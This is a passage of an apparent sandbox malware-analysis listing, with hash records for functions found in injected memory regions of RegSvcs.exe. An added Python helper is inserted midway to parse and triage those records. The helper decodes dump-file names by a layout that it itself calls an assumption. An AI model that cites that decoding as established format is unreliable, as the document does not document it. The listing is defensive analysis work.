• Opcode ID: 801d9170b8222b3578728c74c6d4edcab1d945077b9eccf7944714fe81241639
• Instruction ID: 9c3abd88cd118dbfcf016d1b9f68b10302a2188cbd10393cabd0a972dddff944
• Opcode Fuzzy Hash: 801d9170b8222b3578728c74c6d4edcab1d945077b9eccf7944714fe81241639
• Instruction Fuzzy Hash: AE216270E04245DFDBA9DBA5D8587AE7BF3AFC5244F15C05CD0069B291CB788846CB91
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 92a254443c42df2388cfd2b4ac737b583fcf3b29d9f867a9a1d7db795f605122
• Instruction ID: 3e4626577237bf3167df9550349208b3ed6f2f3851330ee62ec5151bd11360ef
• Opcode Fuzzy Hash: 92a254443c42df2388cfd2b4ac737b583fcf3b29d9f867a9a1d7db795f605122
• Instruction Fuzzy Hash: 25215770E002499FDF55CFA5D594AEEBFB6FF48209F248029E442AA360DB349A45DF60
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf4702c97d9e020b7d1d9cb2d942c0357155d411f59d7656e2a40f68f89bbd4a
• Instruction ID: 8b5f0b46c447646aa48653b9d64fd9bbcfea9d5949c90cb6b41bc74adb95cbe5
• Opcode Fuzzy Hash: bf4702c97d9e020b7d1d9cb2d942c0357155d411f59d7656e2a40f68f89bbd4a
• Instruction Fuzzy Hash: 0211B631A002899FEF50CF68C884B9EBBF2EF85368F058255E5185B2A1E371F850C7B4
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.526483925.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_150d000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 237ac01297be104bb1ca90ead38bbc6519d1d4d0714ef7f30f6c65ef6beda5fc
• Instruction ID: 07f3ba1d062a429727ff8be2b8465bc7a4a4cfe1cea80fa2056bd9888e9f41dd
• Opcode Fuzzy Hash: 237ac01297be104bb1ca90ead38bbc6519d1d4d0714ef7f30f6c65ef6beda5fc
• Instruction Fuzzy Hash: 1311AF76404280DFDB12CF94D9C4B1ABF71FB84324F2486A9DC090B657C33AD456CBA2
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.526483925.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_150d000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 237ac01297be104bb1ca90ead38bbc6519d1d4d0714ef7f30f6c65ef6beda5fc
• Instruction ID: 2934515f35bcad67f4404bde063835733d70dc69c086e1e83512be40901a10a1
• Opcode Fuzzy Hash: 237ac01297be104bb1ca90ead38bbc6519d1d4d0714ef7f30f6c65ef6beda5fc
• Instruction Fuzzy Hash: 6A11B476404244DFDB02CF94D9C4B5ABF71FB84320F24C5A9D8080B657C37AD456CBA1
Uniqueness
• Uniqueness Score: -1.00%
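
The records in this listing are easier to triage programmatically than by eye. The Python below is an added example, not code from the Joe Sandbox report or from Joe Security: it parses the records (three of them copied in as constructed sample input, including the two preceding records that share Opcode ID 237ac012... with different Instruction IDs), decodes the .sdmp file name, flags dumps whose functions live in private PAGE_EXECUTE_READWRITE memory that is not backed by a PE image (the shape of the code injected into RegSvcs.exe in this analysis), and reports opcode-ID collisions. The positional meaning of the .sdmp name fields (process id, snapshot, dump id, base address, page protection, unknown, region type, unknown) is an assumption: it is consistent with the snapshot-file name hcaresult_14_2_6d90000_RegSvcs.jbxd and with the Win32 PAGE_* and MEM_* constants, and the code cross-checks the two names, but the page does not document it. Field names such as `decode_source` and the "based on PE: true" spelling are likewise this example's own.

```python
"""Triage helper for the per-function records of a Joe Sandbox "Memory Dump Source" listing.

Added example, not Joe Sandbox code. Decoding of the .sdmp file name is an assumption
that is cross-checked against the snapshot-file name; see decode_source() below.
"""
import re
from collections import defaultdict

# Constructed sample input: three records copied from this report's listing.
SAMPLE = """\
Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1b0f8de3fc8303856387745808fdb9664c05458cee81808cc2c24ef8a4b8db13
• Instruction ID: a1ce4718f4b9b8519e04f460024ba75258c3718f2487cfa4772ad1e26b8634b7
• Opcode Fuzzy Hash: 1b0f8de3fc8303856387745808fdb9664c05458cee81808cc2c24ef8a4b8db13
• Instruction Fuzzy Hash: CF113C30B102199F8F80FBB9D8949AE77F1FB892547508829E51AE7350EB349D018BA9
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000000E.00000002.526483925.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_150d000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 237ac01297be104bb1ca90ead38bbc6519d1d4d0714ef7f30f6c65ef6beda5fc
• Instruction ID: 07f3ba1d062a429727ff8be2b8465bc7a4a4cfe1cea80fa2056bd9888e9f41dd
• Opcode Fuzzy Hash: 237ac01297be104bb1ca90ead38bbc6519d1d4d0714ef7f30f6c65ef6beda5fc
• Instruction Fuzzy Hash: 1311AF76404280DFDB12CF94D9C4B1ABF71FB84324F2486A9DC090B657C33AD456CBA2
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000000E.00000002.526483925.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_150d000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 237ac01297be104bb1ca90ead38bbc6519d1d4d0714ef7f30f6c65ef6beda5fc
• Instruction ID: 2934515f35bcad67f4404bde063835733d70dc69c086e1e83512be40901a10a1
• Opcode Fuzzy Hash: 237ac01297be104bb1ca90ead38bbc6519d1d4d0714ef7f30f6c65ef6beda5fc
• Instruction Fuzzy Hash: 6A11B476404244DFDB02CF94D9C4B5ABF71FB84320F24C5A9D8080B657C37AD456CBA1
Uniqueness
Uniqueness Score: -1.00%
"""

# One "• Key: value" line; [ \t] rather than \s so an empty value never swallows the next line.
FIELD_RE = re.compile(r"^[ \t]*•?[ \t]*([A-Za-z ]+?):[ \t]*(.*?)[ \t]*$", re.M)
# Assumed layout of the .sdmp name: pid.snapshot.dumpid.base.protect.?.type.?  (hex fields)
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<snapshot>[0-9A-Fa-f]{8})\.(?P<dumpid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<field6>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<field8>[0-9A-Fa-f]{8})\.sdmp$")
SNAPSHOT_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-f]+)_(.+)\.jbxd$")

# Win32 MEMORY_BASIC_INFORMATION constants (documented values).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


def parse_records(text):
    """Split the listing on its 'Memory Dump Source' headers; one dict of fields per record."""
    records = []
    for chunk in re.split(r"^\s*Memory Dump Source\s*$", text, flags=re.M):
        fields = dict(FIELD_RE.findall(chunk))
        if "Source File" in fields:
            records.append(fields)
    return records


def decode_source(source_field):
    """Decode 'NAME.sdmp, Offset: X, based on PE: bool' (field positions are an assumption)."""
    name, _, rest = source_field.partition(",")
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"unrecognised dump name: {name}")
    protect, mem_type = int(m["protect"], 16), int(m["type"], 16)
    return {"pid": int(m["pid"], 16), "snapshot": int(m["snapshot"], 16),
            "base": int(m["base"], 16),
            "protect": PAGE_PROTECT.get(protect & 0xFF, hex(protect)),
            "type": MEM_TYPE.get(mem_type, hex(mem_type)),
            "based_on_pe": "based on PE: true" in rest}  # only "false" appears on the page


def decode_snapshot(snapshot_field):
    """hcaresult_<pid>_<snapshot>_<base>_<process>.jbxd"""
    m = SNAPSHOT_RE.match(snapshot_field.strip())
    if not m:
        raise ValueError(f"unrecognised snapshot name: {snapshot_field}")
    return {"pid": int(m[1]), "snapshot": int(m[2]), "base": int(m[3], 16), "process": m[4]}


def injected_code_dumps(records):
    """Base address -> host process for dumps that are private RWX memory not backed by a PE:
    functions recovered from such regions were written there at run time, not loaded from disk."""
    out = {}
    for r in records:
        src, snap = decode_source(r["Source File"]), decode_snapshot(r["Snapshot File"])
        # The two names must agree; if they do not, the assumed field layout is wrong.
        if (src["pid"], src["snapshot"], src["base"]) != (snap["pid"], snap["snapshot"], snap["base"]):
            raise ValueError(f"dump and snapshot names disagree: {r['Source File']}")
        if (src["protect"] == "PAGE_EXECUTE_READWRITE" and src["type"] == "MEM_PRIVATE"
                and not src["based_on_pe"]):
            out[src["base"]] = snap["process"]
    return out


def opcode_collisions(records):
    """Opcode IDs shared by functions with different Instruction IDs: identical opcode sequence,
    different operands, i.e. candidates for near-duplicate code worth diffing side by side."""
    seen = defaultdict(set)
    for r in records:
        seen[r["Opcode ID"]].add(r["Instruction ID"])
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for base, proc in injected_code_dumps(recs).items():
        print(f"private RWX non-PE region at {base:#x} in {proc}")
    for opc, instr in opcode_collisions(recs).items():
        print(f"opcode ID {opc[:16]}... shared by {len(instr)} functions")
```

Run against the full listing instead of SAMPLE to get the complete set of RWX regions and collisions; the -1.00% uniqueness score and the empty API/String ID fields mean the report itself offers no similarity data for these functions, so the opcode-ID grouping is the only clustering signal the listing provides.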

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1b0f8de3fc8303856387745808fdb9664c05458cee81808cc2c24ef8a4b8db13
• Instruction ID: a1ce4718f4b9b8519e04f460024ba75258c3718f2487cfa4772ad1e26b8634b7
• Opcode Fuzzy Hash: 1b0f8de3fc8303856387745808fdb9664c05458cee81808cc2c24ef8a4b8db13
• Instruction Fuzzy Hash: CF113C30B102199F8F80FBB9D8949AE77F1FB892547508829E51AE7350EB349D018BA9
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3806484cc51dbfd3e8bcb168cdc3c29cebbca98c99e794cdb16153a924bf3ec6
• Instruction ID: e6e04d7660c826bed9a9fe37a26cc852a6ba779dfe7f52ebde191062192635be
• Opcode Fuzzy Hash: 3806484cc51dbfd3e8bcb168cdc3c29cebbca98c99e794cdb16153a924bf3ec6
• Instruction Fuzzy Hash: A6115E30F002199F8F80FBB9D8949AE77F1FFC82147508429D50AE7350EB349D068BA5
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e3d847681ffd258cafe36bb4dfbd90151ddaf7221e22cbd18f4e4d9bb9231d6f
• Instruction ID: 2ae4ecc1602e93818d97ca5ffa947d5bf63976b4f7af4103ece8ad7fe5bb5f99
• Opcode Fuzzy Hash: e3d847681ffd258cafe36bb4dfbd90151ddaf7221e22cbd18f4e4d9bb9231d6f
• Instruction Fuzzy Hash: BF010479E002589FDF48CFD8D9048DDBBB5FF88310F00812AE915AB354D7359919CBA0
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2d15a07ceaa9951f60c5f7ca57691e50b5997902086d6333114c7b7ed60c2eda
                                                                                                                          • Instruction ID: d4fc02db713ac6d15a0e9a838d10342aaaba1976278785e00a68589fc7ed92aa
                                                                                                                          • Opcode Fuzzy Hash: 2d15a07ceaa9951f60c5f7ca57691e50b5997902086d6333114c7b7ed60c2eda
                                                                                                                          • Instruction Fuzzy Hash: 36E06D35B001188B8F80FBB9D8948AC73F1AFC82257508065E506E7390DE349C0597A8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7fbe0f5adaa11a59adef42f32c8557b3fd36b162dc471964955f5e2a1c8e1f68
                                                                                                                          • Instruction ID: 02d2957603f20b0b9583db2c3558148ab62e5a8bdd85a0c006c689a4ae1b11d6
                                                                                                                          • Opcode Fuzzy Hash: 7fbe0f5adaa11a59adef42f32c8557b3fd36b162dc471964955f5e2a1c8e1f68
                                                                                                                          • Instruction Fuzzy Hash: 5FE06D31B101188B8FC0FBB9DC948AC73F1BF882557508465E517E7390DE249C0187A8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f0df72073e1cb3f3e41c887daa18241a5e92d41669f91ee5dc3c0b22aefe85c8
                                                                                                                          • Instruction ID: 75908fc17c6c9adccf34f71b61024f26a4e09392f97c1a1e125f1591f96b31f6
                                                                                                                          • Opcode Fuzzy Hash: f0df72073e1cb3f3e41c887daa18241a5e92d41669f91ee5dc3c0b22aefe85c8
                                                                                                                          • Instruction Fuzzy Hash: C4D02202B202168B9FA402BF156027E30C30B800CBB28083A4422CE2C0FF2CC98462F2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%